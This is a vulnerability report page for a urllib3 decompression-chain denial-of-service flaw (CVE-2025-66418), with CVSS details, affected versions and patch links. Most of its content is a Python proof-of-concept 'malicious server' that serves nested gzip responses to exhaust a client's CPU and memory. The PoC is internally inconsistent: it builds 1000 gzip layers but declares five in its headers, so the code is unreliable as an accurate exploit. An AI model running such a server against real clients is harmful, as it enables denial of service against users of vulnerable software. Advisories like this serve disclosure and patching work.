Security Vulnerability Report
CVE-2025-66418 CVSS 7.5 HIGH

CVE-2025-66418

Published: 2025-12-05 16:15:51
Last Modified: 2025-12-10 16:08:32

Description

urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. This vulnerability is fixed in 2.6.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:python:urllib3:*:*:*:*:*:*:*:* - VULNERABLE
urllib3 >= 1.24, < 2.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import http.server
import gzip


class DecompressionBombHandler(http.server.BaseHTTPRequestHandler):
    """
    Malicious server that exploits CVE-2025-66418
    Creates an infinite decompression chain to cause DoS
    """

    def do_GET(self):
        # Generate decompression bomb with many nested compression layers
        data = b'X' * 1024  # Small initial data
        # Create chain of 1000 compressed layers
        for i in range(1000):
            data = gzip.compress(data)
        self.send_response(200)
        # Send with multiple Content-Encoding headers
        self.send_header('Content-Encoding', 'gzip, gzip, gzip, gzip, gzip')
        self.send_header('Content-Length', str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, format, *args):
        pass  # Suppress logging


def start_server(port=8888):
    server = http.server.HTTPServer(('0.0.0.0', port), DecompressionBombHandler)
    print(f'Malicious server running on port {port}')
    server.serve_forever()


if __name__ == '__main__':
    start_server()

Weakness

CWE-770 (Allocation of Resources Without Limits or Throttling)

Additional Metric (Secondary)

CVSS 4.0: 8.9 HIGH
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

References

Patch: https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8
Vendor Advisory: https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53